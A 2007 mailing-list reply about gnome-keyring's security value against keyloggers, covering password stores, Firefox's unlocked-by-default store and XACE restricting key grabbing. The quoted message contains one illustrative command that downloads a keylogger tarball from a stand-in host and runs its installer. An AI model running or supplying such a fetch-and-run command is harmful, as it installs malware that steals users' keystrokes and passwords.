low-hanging fruit
David Zeuthen
davidz at redhat.com
Mon Aug 20 18:09:00 UTC 2007
Hey,
Ugh, it would be nice if your mail client broke lines properly; it's at
least a mess for me when using Evolution.
On Mon, 2007-08-20 at 13:26 -0400, Colin Walters wrote:
> Unrelated but - in my opinion gnome-keyring adds
> very little in terms of security to this scenario.
>
> wget http://my.favorite.keylogger.example.com/linux-x86.tgz && \
> tar xzvf *.tgz && sh keylogger/install.sh
Two things:

- It's a fair goal to ensure that users don't have to enter any
  passwords and I think gnome-keyring and other password stores (like
  the one in Firefox) help with that. Especially if it's automatically
  unlocked when you log in.

  It's also pretty damn convenient that I don't have to type in these
  passwords all the time. Plus I can rest assured that if my laptop
  is stolen, some of my passwords are encrypted (ask blizzard about
  getting his laptop stolen).

  FWIW, I consider it a bug that the password store in e.g. Firefox
  isn't locked the same way we lock gnome-keyring; I know the option
  in Firefox is there but we just uncheck it by default so you get
  plaintext passwords.

  (Of course another solution to the "unlock keyring" problem is just
  to use encrypted home directories.)

- It's just a bug [1] that an unprivileged process like your keylogger
  can grab key presses while the gnome-keyring password dialog is
  focused. With things like XACE, we can prevent that and only allow
  privileged applications like e.g. a screen reader / on-screen
  keyboard to do this.

Of course you can now turn this into a discussion about trusted path.
David
[1] : or misfeature, whatever